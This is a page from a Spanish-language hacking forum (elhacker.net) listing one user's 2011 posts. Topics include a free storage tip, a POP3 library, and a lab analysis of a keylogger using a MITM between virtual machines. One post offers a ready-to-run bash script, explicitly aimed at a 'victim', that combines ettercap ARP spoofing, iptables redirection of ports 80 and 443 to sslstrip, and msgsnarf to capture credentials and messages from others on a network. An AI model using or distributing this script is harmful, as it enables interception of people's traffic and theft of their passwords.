elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1]
1  Foros Generales / Dudas Generales / Almacenamiento de 2 Gigas en internet (GRATIS) en: 1 Junio 2011, 15:05 pm
DROPBOX

Es un servicio de almacenamiento gratuito en Internet, el espacio inicial es de 2Gb
pero se puede expander hasta 8Gb.

A este servicio se puede acceder desde una Computadora hasta un Telefono Movil.


LINK: https://www.dropbox.com/


Editado: no links con referrals para ganar espacio.
2  Seguridad Informática / Hacking / Re: Ettercap - Contraseña SSL - Cual es mejor forma? en: 5 Mayo 2011, 03:11 am
Yo utilizo el ettercap para arpspoofing y para snifear, y luego redirijo los puerto 80 y 443 al sslstrip, porque si lo dejo que lo haga el ettercap, a la victima le aparece en el browser una advertencia de certificado erróneo.

Aca te dejo un script que arme, create un archivo snifeototal.sh y pega el contenido del texto que escribo a continuación, luego de grabar #chmod 777 snifeototal.sh
y por ultimo #./snifeototal.sh, espero que te sirva.

texto a copiar:

echo
echo "Full Sniffing-----------------"
echo "-------------by Usuario Equis"
echo
echo -n "Adaptador de RED: "
read -e ADAPT
echo -n "Puerta de Enlace o Gateway: "
read -e GATEW
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
xterm -geometry 75x75+1+1 -T "ARP Spoofing con Ettercap" -e ettercap -Tq -M arp:remote /$GATEW/ // -P autoadd -i $ADAPT -m /tmp/capturaetter.log
sleep 1
iptables -t nat -L -n
sleep 1
iptables -t nat -D PREROUTING 1
iptables -t nat -D PREROUTING 1
iptables -t nat -L -n
sleep 1
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --dport 443 -j  REDIRECT --to-port 10000
xterm -geometry 75x35+1+100 -T "SSLStrip" -e sslstrip -k -l 10000 -a -w /tmp/captura.log
sleep 1
xterm -geometry 75x35+1+200 -T "Visualizacion del Log" -e tail -f /tmp/captura.log
xterm -geometry 75x35+1+300 -T "Visualizacion del Log de Ettercap" -e tail -f /tmp/capturaetter.log
xterm -geometry 75x35+1+400 -T "Messenger" -e msgsnarf -i $ADAPT



 
3  Seguridad Informática / Hacking / Re: SNIFFEO DE CONEXIONES SSL en: 25 Abril 2011, 05:53 am
Se me ocurrió esta otra manera de modo local

 

Me parece mejor ya que veo todo el trafico de esa conexion

::)
4  Programación / .NET (C#, VB.NET, ASP) / Re: POP3 SSL en vb.net ó vb6 en: 16 Abril 2011, 23:08 pm
OstroSoft POP3 Component (OSPOP3) is a .NET library for retrieving emails programmatically. Works with POP3 mailboxes. Supports secure email(TLS/SSL), email (MIME) attachments, HTML email, custom headers, embedded objects.


http://www.ostrosoft.com/POP3_component.asp


Unlimited usage for developing non-commercial applications.

5  Seguridad Informática / Hacking / SNIFFEO DE CONEXIONES SSL en: 16 Abril 2011, 15:49 pm
Necesito saber si alguien tiene alguna otra idea de como solucionar este tema de modo local, Baje de Internet una aplicación  que estaba infectada con un keylogger (Ardamax) me puse sniffear, y encontré que establecía una conexión al smtp de gmail, por el puerto 465 (SSL).
Como la conexion estaba cifrada el sniffer no me servia.
Lo que se me ocurrio fue infectar una maquina virtual con windows xp, y desde otra maquina virtual con Backtrack, utilizando el Ettercap junto a su función "Man the Middle", lo pude lograr.

Acá dejo el video del modo en que lo realice.

http://vimeo.com/22362014

Tambien pense si hay alguna tool que simule ser un servidor de smtp con ssl, y modificar el archivo hosts y ponerle el dominio de gmail apuntando al localhost, pero no logre encontrar esa aplicacion (si alguien sabe si existe) tipo un honeypot

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines